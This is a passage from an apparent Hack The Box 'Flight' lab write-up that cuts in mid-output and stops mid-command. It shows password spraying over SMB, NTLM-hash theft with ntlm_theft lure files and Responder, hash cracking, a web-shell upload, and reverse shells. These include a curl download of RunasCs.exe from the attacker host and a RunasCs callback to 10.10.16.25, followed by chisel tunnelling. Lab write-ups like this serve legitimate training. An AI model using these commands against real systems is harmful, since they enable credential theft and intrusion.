                     2022-09-22 20:08:22 0       Sysadmin </span><br><span class="line">SMB         10.129.228.120  445    G0               C.Bum                         2022-09-22 20:08:22 0       Senior Web Developer </span><br><span class="line">SMB         10.129.228.120  445    G0               W.Walker                      2022-09-22 20:08:22 0       Payroll officer </span><br><span class="line">SMB         10.129.228.120  445    G0               I.Francis                     2022-09-22 20:08:22 0       Nobody knows why he&#x27;s here </span><br><span class="line">SMB         10.129.228.120  445    G0               D.Truff                       2022-09-22 20:08:22 0       Project Manager </span><br><span class="line">SMB         10.129.228.120  445    G0               V.Stevens                     2022-09-22 20:08:22 0       Secretary </span><br><span class="line">SMB         10.129.228.120  445    G0               svc_apache                    2022-09-22 20:08:23 0       Service Apache web </span><br><span class="line">SMB         10.129.228.120  445    G0               O.Possum                      2022-09-22 20:08:23 0       Helpdesk </span><br><span class="line">SMB         10.129.228.120  445    G0               [*] Enumerated 15 local users: flight</span><br><span class="line">➜  Flight nxc smb 10.129.228.120 -u &#x27;svc_apache&#x27; -p &#x27;S@Ss!K@*t13&#x27; --users | awk &#x27;NR&gt;3 &#123;print $5&#125;&#x27; &gt; users.txt</span><br><span class="line">➜  Flight cat users.txt                                  </span><br><span class="line">S.Moon</span><br><span class="line">R.Cold</span><br><span class="line">G.Lors</span><br><span class="line">L.Kein</span><br><span class="line">M.Gold</span><br><span class="line">C.Bum</span><br><span class="line">W.Walker</span><br><span class="line">I.Francis</span><br><span class="line">D.Truff</span><br><span class="line">V.Stevens</span><br><span class="line">svc_apache</span><br><span class="line">O.Possum</span><br><span class="line">➜  Flight </span><br></pre></td></tr></table></figure></div><p>Got usernames from smb using valid creds of <code>svc_apache</code> and sprayed password of <code>svc_apache</code> with the all users found and got other hit on one other user <code>S.Moon</code></p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">➜  Flight nxc smb 10.129.228.120 -u users.txt -p &#x27;S@Ss!K@*t13&#x27; --continue-on-success </span><br><span class="line">SMB         10.129.228.120  445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.129.228.120  445    G0               [+] flight.htb\S.Moon:S@Ss!K@*t13 </span><br><span class="line">SMB         10.129.228.120  445    G0               [-] flight.htb\R.Cold:S@Ss!K@*t13 STATUS_LOGON_FAILURE </span><br><span class="line">SMB         10.129.228.120  445    G0               [-] flight.htb\G.Lors:S@Ss!K@*t13 STATUS_LOGON_FAILURE </span><br><span class="line">SMB         10.129.228.120  445    G0               [-] flight.htb\L.Kein:S@Ss!K@*t13 STATUS_LOGON_FAILURE </span><br><span class="line">SMB         10.129.228.120  445    G0               [-] flight.htb\M.Gold:S@Ss!K@*t13 STATUS_LOGON_FAILURE </span><br><span class="line">SMB         10.129.228.120  445    G0               [-] flight.htb\C.Bum:S@Ss!K@*t13 STATUS_LOGON_FAILURE </span><br><span class="line">SMB         10.129.228.120  445    G0               [-] flight.htb\W.Walker:S@Ss!K@*t13 STATUS_LOGON_FAILURE </span><br><span class="line">SMB         10.129.228.120  445    G0               [-] flight.htb\I.Francis:S@Ss!K@*t13 STATUS_LOGON_FAILURE </span><br><span class="line">SMB         10.129.228.120  445    G0               [-] flight.htb\D.Truff:S@Ss!K@*t13 STATUS_LOGON_FAILURE </span><br><span class="line">SMB         10.129.228.120  445    G0               [-] flight.htb\V.Stevens:S@Ss!K@*t13 STATUS_LOGON_FAILURE </span><br><span class="line">SMB         10.129.228.120  445    G0               [+] flight.htb\svc_apache:S@Ss!K@*t13 </span><br><span class="line">SMB         10.129.228.120  445    G0               [-] flight.htb\O.Possum:S@Ss!K@*t13 STATUS_LOGON_FAILURE </span><br><span class="line">➜  Flight </span><br></pre></td></tr></table></figure></div><p>Now we have READ, WRITE permission on <code>Shared</code> share so we can try to get creds of any other users by uploading ntlm_theft files. We can generate files by using <code>ntlm_theft.py</code></p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">➜  Flight python3 ~/Tools/ntlm_theft/ntlm_theft.py --generate all --server 10.10.16.25 --filename test </span><br><span class="line">Created: test/test.scf (BROWSE TO FOLDER)</span><br><span class="line">Created: test/test-(url).url (BROWSE TO FOLDER)</span><br><span class="line">Created: test/test-(icon).url (BROWSE TO FOLDER)</span><br><span class="line">Created: test/test.lnk (BROWSE TO FOLDER)</span><br><span class="line">Created: test/test.rtf (OPEN)</span><br><span class="line">Created: test/test-(stylesheet).xml (OPEN)</span><br><span class="line">Created: test/test-(fulldocx).xml (OPEN)</span><br><span class="line">Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)</span><br><span class="line">Created: test/test-(includepicture).docx (OPEN)</span><br><span class="line">Created: test/test-(remotetemplate).docx (OPEN)</span><br><span class="line">Created: test/test-(frameset).docx (OPEN)</span><br><span class="line">Created: test/test-(externalcell).xlsx (OPEN)</span><br><span class="line">Created: test/test.wax (OPEN)</span><br><span class="line">Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)</span><br><span class="line">Created: test/test.asx (OPEN)</span><br><span class="line">Created: test/test.jnlp (OPEN)</span><br><span class="line">Created: test/test.application (DOWNLOAD AND OPEN)</span><br><span class="line">Created: test/test.pdf (OPEN AND ALLOW)</span><br><span class="line">Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)</span><br><span class="line">Created: test/Autorun.inf (BROWSE TO FOLDER)</span><br><span class="line">Created: test/desktop.ini (BROWSE TO FOLDER)</span><br><span class="line">Generation Complete.</span><br></pre></td></tr></table></figure></div><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">➜  test smbclient \\\\flight.htb\\Shared -U S.moon</span><br><span class="line">Password for [WORKGROUP\S.moon]:</span><br><span class="line">Try &quot;help&quot; to get a list of possible commands.</span><br><span class="line">smb: \&gt; recurse on</span><br><span class="line">smb: \&gt; prompt off</span><br><span class="line">smb: \&gt; put *</span><br><span class="line">* does not exist</span><br><span class="line">smb: \&gt; put </span><br><span class="line">Autorun.inf                   test.asx                      test-(fulldocx).xml           test-(includepicture).docx    test.m3u                      test.rtf                      test-(url).url</span><br><span class="line">desktop.ini                   test-(externalcell).xlsx      test.htm                      test.jnlp                     test.pdf                      test.scf                      test.wax</span><br><span class="line">test.application              test-(frameset).docx          test-(icon).url               test.lnk                      test-(remotetemplate).docx    test-(stylesheet).xml         zoom-attack-instructions.txt</span><br><span class="line">smb: \&gt; put *</span><br><span class="line">* does not exist</span><br><span class="line">smb: \&gt; mput *</span><br><span class="line">NT_STATUS_ACCESS_DENIED opening remote file \test.pdf</span><br><span class="line">NT_STATUS_ACCESS_DENIED opening remote file \test.wax</span><br><span class="line">NT_STATUS_ACCESS_DENIED opening remote file \zoom-attack-instructions.txt</span><br><span class="line">NT_STATUS_ACCESS_DENIED opening remote file \Autorun.inf</span><br><span class="line">NT_STATUS_ACCESS_DENIED opening remote file \test.asx</span><br><span class="line">NT_STATUS_ACCESS_DENIED opening remote file \test.lnk</span><br><span class="line">putting file test.jnlp as \test.jnlp (0.3 kb/s) (average 0.3 kb/s)</span><br><span class="line">putting file test.application as \test.application (1.5 kb/s) (average 1.1 kb/s)</span><br></pre></td></tr></table></figure></div><p>I started my responder listerner and uploaded <code>ntlm_theft</code> files to <code>Shared</code> share and after few seconds i got a response back in my Responder with hash of other user <code>c.bum</code>, after cracking i got <code>c.bum</code> users password.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">➜  Flight sudo responder -I tun0</span><br><span class="line">[SMB] NTLMv2-SSP Client   : 10.129.228.120</span><br><span class="line">[SMB] NTLMv2-SSP Username : flight.htb\c.bum</span><br><span class="line">[SMB] NTLMv2-SSP Hash     : c.bum::flight.htb:9b0b2d686a2b92e9:82D52AD3695FC61C3BECC964FACA328A:01010000000000008082FCB16237DB01978F932AF723229900000000020008004B00410035005A0001001E00570049004E002D00370052003000440056003500590033004A0036004B0004003400570049004E002D00370052003000440056003500590033004A0036004B002E004B00410035005A002E004C004F00430041004C00030014004B00410035005A002E004C004F00430041004C00050014004B00410035005A002E004C004F00430041004C00070008008082FCB16237DB010600040002000000080030003000000000000000000000000030000084B4169240A50F43AB98F19FBE4B105A949C2733F3B4C011FCA04B28C025E5020A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00320035000000000000000000</span><br></pre></td></tr></table></figure></div><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">➜  Flight john hash2 --wordlist=/usr/share/wordlists/rockyou.txt</span><br><span class="line">Using default input encoding: UTF-8</span><br><span class="line">Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])</span><br><span class="line">Will run 4 OpenMP threads</span><br><span class="line">Press &#x27;q&#x27; or Ctrl-C to abort, almost any other key for status</span><br><span class="line">Tikkycoll_431012284 (c.bum)     </span><br><span class="line">1g 0:00:00:03 DONE (2024-11-15 13:33) 0.2557g/s 2694Kp/s 2694Kc/s 2694KC/s TinyMutt69..Tiffani29</span><br><span class="line">Use the &quot;--show --format=netntlmv2&quot; options to display all of the cracked passwords reliably</span><br><span class="line">Session completed. </span><br><span class="line">➜  Flight </span><br></pre></td></tr></table></figure></div><p>With c.bum’s creds we have write access to web share so we can upload a asp web shell and get a shell.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">➜  Flight smbclient \\\\flight.htb\\Web -U c.bum           </span><br><span class="line">Password for [WORKGROUP\c.bum]:</span><br><span class="line">Try &quot;help&quot; to get a list of possible commands.</span><br><span class="line">smb: \&gt; ls</span><br><span class="line">  .                                   D        0  Fri Nov 15 13:37:00 2024</span><br><span class="line">  ..                                  D        0  Fri Nov 15 13:37:00 2024</span><br><span class="line">  flight.htb                          D        0  Fri Nov 15 13:37:00 2024</span><br><span class="line">  school.flight.htb                   D        0  Fri Nov 15 13:37:00 2024</span><br><span class="line"></span><br><span class="line">                5056511 blocks of size 4096. 1252959 blocks available</span><br><span class="line">smb: \&gt; cd school.flight.htb\</span><br><span class="line">smb: \school.flight.htb\&gt; ls</span><br><span class="line">  .                                   D        0  Fri Nov 15 13:37:00 2024</span><br><span class="line">  ..                                  D        0  Fri Nov 15 13:37:00 2024</span><br><span class="line">  about.html                          A     1689  Mon Oct 24 23:54:45 2022</span><br><span class="line">  blog.html                           A     3618  Mon Oct 24 23:53:59 2022</span><br><span class="line">  home.html                           A     2683  Mon Oct 24 23:56:58 2022</span><br><span class="line">  images                              D        0  Fri Nov 15 13:37:00 2024</span><br><span class="line">  index.php                           A     2092  Thu Oct 27 03:59:25 2022</span><br><span class="line">  lfi.html                            A      179  Thu Oct 27 03:55:16 2022</span><br><span class="line">  styles                              D        0  Fri Nov 15 13:37:00 2024</span><br><span class="line"></span><br><span class="line">                5056511 blocks of size 4096. 1252831 blocks available</span><br><span class="line">smb: \school.flight.htb\&gt; put shell.php</span><br><span class="line">putting file shell.php as \school.flight.htb\shell.php (0.4 kb/s) (average 13.1 kb/s)</span><br><span class="line">smb: \school.flight.htb\&gt; </span><br></pre></td></tr></table></figure></div><p><img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/HTB/Flight/shell.png"                                     ><br>After uploading we can access that file from web page and we can get a shell using a normal powershell reverse shell and we get a shell of user <code>svc_apache</code></p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">➜  Flight nc -nvlp 1212                                                 </span><br><span class="line">Listening on 0.0.0.0 1212</span><br><span class="line">Connection received on 10.129.228.120 53863</span><br><span class="line"></span><br><span class="line">PS C:\xampp\htdocs\school.flight.htb&gt; whoami</span><br><span class="line">flight\svc_apache</span><br><span class="line">PS C:\xampp\htdocs\school.flight.htb&gt; </span><br></pre></td></tr></table></figure></div><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br></pre></td><td class="code"><pre><span class="line">➜  Flight nc -nvlp 1212                                                 </span><br><span class="line">Listening on 0.0.0.0 1212</span><br><span class="line">Connection received on 10.129.228.120 53863</span><br><span class="line"></span><br><span class="line">PS C:\xampp\htdocs\school.flight.htb&gt; whoami</span><br><span class="line">flight\svc_apache</span><br><span class="line">PS C:\xampp\htdocs\school.flight.htb&gt; cd ../..</span><br><span class="line">PS C:\xampp&gt; ls</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    Directory: C:\xampp</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Mode                LastWriteTime         Length Name                                                                  </span><br><span class="line">----                -------------         ------ ----                                                                  </span><br><span class="line">d-----        9/22/2022   1:08 PM                apache                                                                </span><br><span class="line">d-----        9/22/2022   1:08 PM                cgi-bin                                                               </span><br><span class="line">d-----        9/22/2022   1:08 PM                contrib                                                               </span><br><span class="line">d-----        9/22/2022   1:08 PM                FileZillaFTP                                                          </span><br><span class="line">d-----       11/15/2024  11:02 AM                htdocs                                                                </span><br><span class="line">d-----        9/22/2022   1:09 PM                install                                                               </span><br><span class="line">d-----        9/22/2022   1:09 PM                licenses                                                              </span><br><span class="line">d-----        9/22/2022   1:09 PM                locale                                                                </span><br><span class="line">d-----        9/22/2022   1:08 PM                MercuryMail                                                           </span><br><span class="line">d-----        9/22/2022   1:09 PM                mysql                                                                 </span><br><span class="line">d-----        9/22/2022   1:10 PM                perl                                                                  </span><br><span class="line">d-----        9/22/2022   1:14 PM                php                                                                   </span><br><span class="line">d-----        9/22/2022   1:16 PM                phpMyAdmin                                                            </span><br><span class="line">d-----        9/22/2022   1:16 PM                sendmail                                                              </span><br><span class="line">d-----        9/22/2022   1:16 PM                tmp                                                                   </span><br><span class="line">d-----        9/22/2022   1:16 PM                tomcat                                                                </span><br><span class="line">d-----        9/22/2022   1:16 PM                webalizer                                                             </span><br><span class="line">d-----        9/22/2022   1:16 PM                webdav                                                                </span><br><span class="line">-a----         6/7/2013  11:15 AM            436 apache_start.bat                                                      </span><br><span class="line">-a----        10/1/2019   7:13 AM            190 apache_stop.bat                                                       </span><br><span class="line">-a----         4/5/2021   4:16 PM          10324 catalina_service.bat                                                  </span><br><span class="line">-a----         4/5/2021   4:17 PM           3766 catalina_start.bat                                                    </span><br><span class="line">-a----         4/5/2021   4:17 PM           3529 catalina_stop.bat                                                     </span><br><span class="line">-a----         6/3/2019  11:39 AM            471 mysql_start.bat                                                       </span><br><span class="line">-a----        10/1/2019   7:13 AM            270 mysql_stop.bat                                                        </span><br><span class="line">-a----        3/13/2017  11:04 AM            824 passwords.txt                                                         </span><br><span class="line">-a----       12/24/2021   2:11 PM           7651 readme_de.txt                                                         </span><br><span class="line">-a----       12/24/2021   2:11 PM           7513 readme_en.txt                                                         </span><br><span class="line">-a----       11/12/2015   4:13 PM            370 setup_xampp.bat                                                       </span><br><span class="line">-a----       11/29/2020   1:38 PM           1671 test_php.bat                                                          </span><br><span class="line">-a----         4/6/2021  11:38 AM        3368448 xampp-control.exe                                                     </span><br><span class="line">-a----         4/5/2021   4:08 PM            978 xampp-control.ini                                                     </span><br><span class="line">-a----        3/30/2013  12:29 PM         118784 xampp_start.exe                                                       </span><br><span class="line">-a----        3/30/2013  12:29 PM         118784 xampp_stop.exe                                                        </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">PS C:\xampp&gt; cd ..</span><br><span class="line">PS C:\&gt; ls</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    Directory: C:\</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Mode                LastWriteTime         Length Name                                                                  </span><br><span class="line">----                -------------         ------ ----                                                                  </span><br><span class="line">d-----       11/15/2024  11:02 AM                inetpub                                                               </span><br><span class="line">d-----         6/7/2022   6:39 AM                PerfLogs                                                              </span><br><span class="line">d-r---       10/21/2022  11:49 AM                Program Files                                                         </span><br><span class="line">d-----        7/20/2021  12:23 PM                Program Files (x86)                                                   </span><br><span class="line">d-----       11/15/2024  10:36 AM                Shared                                                                </span><br><span class="line">d-----        9/22/2022  12:28 PM                StorageReports                                                        </span><br><span class="line">d-r---        9/22/2022   1:16 PM                Users                                                                 </span><br><span class="line">d-----       10/21/2022  11:52 AM                Windows                                                               </span><br><span class="line">d-----        9/22/2022   1:16 PM                xampp                                                                 </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">PS C:\&gt; mkdir Temp</span><br><span class="line">cd </span><br><span class="line"></span><br><span class="line">    Directory: C:\</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Mode                LastWriteTime         Length Name                                                                  </span><br><span class="line">----                -------------         ------ ----                                                                  </span><br><span class="line">d-----       11/15/2024  11:04 AM                Temp                                                                  </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">PS C:\&gt; Temp</span><br><span class="line">PS C:\Temp&gt; ls</span><br><span class="line">PS C:\Temp&gt; curl 10.10.16.25:1337/RunasCs.exe -o RunasCs.exe</span><br><span class="line">PS C:\Temp&gt; .\RunasCs.exe C.Bum Tikkycoll_431012284 cmd.exe -r 10.10.16.25:1234</span><br><span class="line">[*] Warning: The logon for user &#x27;C.Bum&#x27; is limited. Use the flag combination --bypass-uac and --logon-type &#x27;8&#x27; to obtain a more privileged token.</span><br><span class="line"></span><br><span class="line">[+] Running in session 0 with process function CreateProcessWithLogonW()</span><br><span class="line">[+] Using Station\Desktop: Service-0x0-856ce$\Default</span><br><span class="line">[+] Async process &#x27;C:\Windows\system32\cmd.exe&#x27; with pid 900 created in background.</span><br><span class="line">PS C:\Temp&gt; </span><br></pre></td></tr></table></figure></div><p>Since we have creds of <code>C.Bum</code> i tried using <code>RunasCs.exe</code> to get other shell and it worked and we got a shell as <code>C.Bum</code></p><h4 id="User-c-bum"><a href="#User-c-bum" class="headerlink" title="User c.bum"></a>User c.bum</h4><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">➜  Flight nc -nvlp 1234</span><br><span class="line">Listening on 0.0.0.0 1234</span><br><span class="line">Connection received on 10.129.228.120 63400</span><br><span class="line">Microsoft Windows [Version 10.0.17763.2989]</span><br><span class="line">(c) 2018 Microsoft Corporation. All rights reserved.</span><br><span class="line"></span><br><span class="line">C:\Windows\system32&gt;whoami</span><br><span class="line">whoami</span><br><span class="line">flight\c.bum</span><br><span class="line"></span><br><span class="line">C:\Windows\system32&gt;</span><br></pre></td></tr></table></figure></div><p>After checking network connection i found there is a port 8000 listening locally, and also we can see there is a folder named <code>C:\inetpub\development</code> so it will be some web servers. By using chisel i forwarded port 8000 to my local machin in port 8989.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\C.Bum\Desktop&gt;netstat -an | findstr LISTEN</span><br><span class="line">netstat -an | findstr LISTEN</span><br><span class="line">  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    0.0.0.0:8000           0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    0.0.0.0:49677          0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    0.0.0.0:49678          0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    0.0.0.0:49690          0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    0.0.0.0:49698          0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    0.0.0.0:51121          0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    10.129.228.120:53      0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    10.129.228.120:139     0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING</span><br><span class="line">  TCP    [::]:80                [::]:0                 LISTENING</span><br><span class="line">  TCP    [::]:88                [::]:0                 LISTENING</span><br><span class="line">  TCP    [::]:135               [::]:0                 LISTENING</span><br><span class="line">  TCP    [::]:389               [::]:0                 LISTENING</span><br><span class="line">  TCP    [::]:443               [::]:0                 LISTENING</span><br><span class="line">  TCP    [::]:445               [::]:0                 LISTENING</span><br><span class="line">  TCP    [::]:464               [::]:0                 LISTENING</span><br><span class="line">  TCP    [::]:593               [::]:0                 LISTENING</span><br><span class="line">  TCP    [::]:636               [::]:0                 LISTENING</span><br><span class="line">  TCP    [::]:3268              [::]:0                 LISTENING</span><br><span class="line">  TCP    [::]:3269              [::]:0                 LISTENING</span><br><span class="line">  TCP    [::]:5985              [::]:0                 LISTENING</span><br><span class="line">  TCP    [::]:8000              [::]:0                 LISTENING</span><br><span class="line">  TCP    [::]:9389              [::]:0                 LISTENING</span><br><span class="line">  TCP    [::]:47001             [::]:0                 LISTENING</span><br><span class="line">  TCP    [::]:49664             [::]:0                 LISTENING</span><br><span class="line">  TCP    [::]:49665             [::]:0                 LISTENING</span><br><span class="line">  TCP    [::]:49666             [::]:0                 LISTENING</span><br><span class="line">  TCP    [::]:49667             [::]:0                 LISTENING</span><br><span class="line">  TCP    [::]:49677             [::]:0                 LISTENING</span><br><span class="line">  TCP    [::]:49678             [::]:0                 LISTENING</span><br><span class="line">  TCP    [::]:49690             [::]:0                 LISTENING</span><br><span class="line">  TCP    [::]:49698             [::]:0                 LISTENING</span><br><span class="line">  TCP    [::]:51121             [::]:0                 LISTENING</span><br><span class="line">  TCP    [::1]:53               [::]:0                 LISTENING</span><br><span class="line">  TCP    [dead:beef::c1dd:e91e:5896:3429]:53  [::]:0                 LISTENING</span><br><span class="line">  TCP    [fe80::c1dd:e91e:5896:3429%6]:53  [::]:0                 LISTENING</span><br><span class="line"></span><br><span class="line">C:\Users\C.Bum\Desktop&gt;</span><br></pre></td></tr></table></figure></div><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">C:\Temp&gt;.\chisel.exe client 10.10.16.25:1338 R:8989:127.0.0.1:8000 </span><br><span class="line">.\chisel.exe client 10.10.16.25:1338 R:8989:127.0.0.1:8000</span><br><span class="line">2024/11/15 14:54:44 client: Connecting to ws://10.10.16.25:1338</span><br><span class="line">2024/11/15 14:54:51 client: Connected (Latency 